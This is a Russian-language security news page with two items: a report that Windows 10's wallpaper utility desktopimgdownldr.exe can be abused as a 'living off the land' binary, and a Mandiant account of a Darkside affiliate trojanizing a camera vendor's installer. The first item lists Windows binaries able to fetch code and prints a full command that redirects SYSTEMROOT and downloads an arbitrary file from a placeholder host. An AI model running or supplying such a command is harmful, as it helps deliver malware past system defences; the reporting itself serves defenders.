Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Аффилиат Darkside заразил сайт вендора охранных систем видеонаблюдения

Группа хакеров, состоявшая в партнерских отношениях с владельцами шифровальщика Darkside, взломала сайт поставщика IP-камер и внесла вредоносный код в два программных пакета, предлагаемых для скачивания. Атаку на цепочку поставок удалось обнаружить и пресечь благодаря оперативности одной из жертв заражения, призвавшей на помощь сторонних специалистов.

Как оказалось, хакеры проникли в ее сеть с помощью вредоносной версии Windows-приложения SmartPSS (предназначено для работы с камерами Dahua). Зловреда 18 мая загрузил с легитимного сайта один из сотрудников пострадавшей компании. Выявив источник, исследователи из Mandiant уведомили вендора о взломе, и сайт уже очистили от инфекции.

Троянизированный инсталлятор установил в систему бэкдор, который эксперты идентифицировали как SMOKEDHAM. Наличие этого выполняемого в памяти зловреда позволило определить авторов атаки: SMOKEDHAM использует единственная ОПГ — в Mandiant ей присвоили кодовое имя UNC2465.

Обеспечив себе точку входа в сеть, злоумышленники закрепились в системе, загрузив с помощью бэкдора легитимную утилиту NGROK. (Эта программа позволяет создавать туннели для интернет-доступа к локальным серверам, размещенным за NAT.).

Через пять дней они пустили в ход дополнительные инструменты: кейлоггер, Cobalt Strike, а также собрали логины и пароли локальных пользователей, сделав дампы памяти lsass.exe. Добыв нужную информацию, взломщики начали продвигаться вширь по сети, используя RDP.

 

Группировка UNC2465 — один из нескольких постоянных клиентов Darkside-сервиса, которых в Mandiant различают по номерам. Такие партнеры обычно взламывают сеть, а затем запускают в нее арендованного шифровальщика, делясь выручкой от его работы с владельцами зловреда.

После закрытия этого одиозного предприятия его клиентура осталась без основного орудия выколачивания денег и начала искать альтернативы. Не исключено, что в ближайшем будущем UNC2465 найдет замену Darkside и возобновит сбор дани с жертв взлома.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru